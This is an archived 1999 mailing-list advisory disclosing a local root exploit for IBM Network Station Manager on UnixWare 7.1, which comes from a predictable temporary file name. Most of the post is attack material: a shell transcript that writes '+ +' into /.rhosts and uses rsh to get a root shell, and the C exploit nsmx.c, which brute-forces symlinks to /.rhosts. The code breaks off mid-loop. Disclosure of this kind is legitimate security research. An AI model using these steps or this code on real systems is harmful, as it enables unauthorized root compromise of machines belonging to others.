IBM NetStation/UnixWare local root exploit

From: Brock Tellier (btellierat_private)
Date: Mon Dec 27 1999 - 18:09:29 PST

  • Next message: Brock Tellier: "UnixWare local pis exploit"

    A vulnerability in IBM's Network Station Manager will allow any local 
    user to gain root privileges.
    Though I only tested NetStation on UnixWare 7.1, I would imagine that 
    this vulnerability is present on most NetStation implementations.  This daemon
    is installed/running as root by default.
    >From the help html:
      The IBM Network Station Manager is a browser-based tool
      for centrally administering IBM Network Stations and their
      users. Using the IBM Network Station Manager, the
      administrator can set IBM Network Station settings on a
      server wide basis or an individual user or workstation basis.
      Settings are specifications defining hardware (keyboards,
      mouse speeds and so on) and software as it applies to your
    More or less, it's an http gui for managing your desktop configuration.
    A vulnerability exists in the way NetStation creates temporary files.
    Instead of using the secure-ish mktemp, NetStation merely appends the
    current time in seconds to a known file name.  Normally, tmp races 
    aren't a big deal for http daemons since they run as nobody or similar, but
    NetStation must run as root to be able to open/modify files as a specific
    user.  Thus, we can brute force a symlink from xnec.nsu.<time> 
    to /.rhosts and gain root.
    bash-2.02$ ls /usr/netstation/nsm/users/xnec
    UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file
    or directory
    <now we go to http://localhost:880, login and click on>
    <Hardware -> Workstation>
    bash-2.02$ ls /usr/netstation/nsm/users/xnec
    xnec.nsu  xnec.usr
    bash-2.02$ cc -o nsmx nsmx.c
    bash-2.02$ ./nsmx
    <click on Workstation again>
    bash-2.02$ ls -la /.rhosts
    -rwx------    1 xnec     other             0 Dec 28 06:19 /.rhosts
    bash-2.02$ echo "+ +" > /.rhosts
    bash-2.02$ chown root /.rhosts
    bash-2.02$ rsh -l root localhost sh -i
    # id
    uid=0(root) gid=3(sys)
    /* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
     * Exploits a temporary file race condition in NetStation's HTTP interface
     * To exploit: first, change the paths below to reflect your individual
     * settings/paths.  Don't worry if <username>.nsu doesn't exist, NS will
     * create it for you.  Next, point your browser at 
     * http://localhost:880 and login as a normal user.  Click on "Hardware"
     * Then "workstation".  This will create <netstationdir>/users/xnec.
     * Next, compile and run this program.  You only have thirty seconds from
     * the time you complete this step to then click on "Workstation".  When
     * this is done, you should have an /.rhosts which you own.  On some 
     * UnixWare systems, you may need to chown root /.rhosts in order to do
     * rsh -l root localhost sh -i.
     * Brock Tellier btellierat_private
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/time.h>
    void main() {
    /* Change these paths */
    char dest[20] = "/.rhosts";
    char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
    char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
    long sec;
    int i;
    sec = time(0);
    for (i = 0; i < 30; i++) {
      sprintf(sourcesym, "%s%d", source, (sec + i));
    Brock Tellier
    UNIX Systems Administrator
    Chicago, IL, USA
    Get free email and a permanent address at

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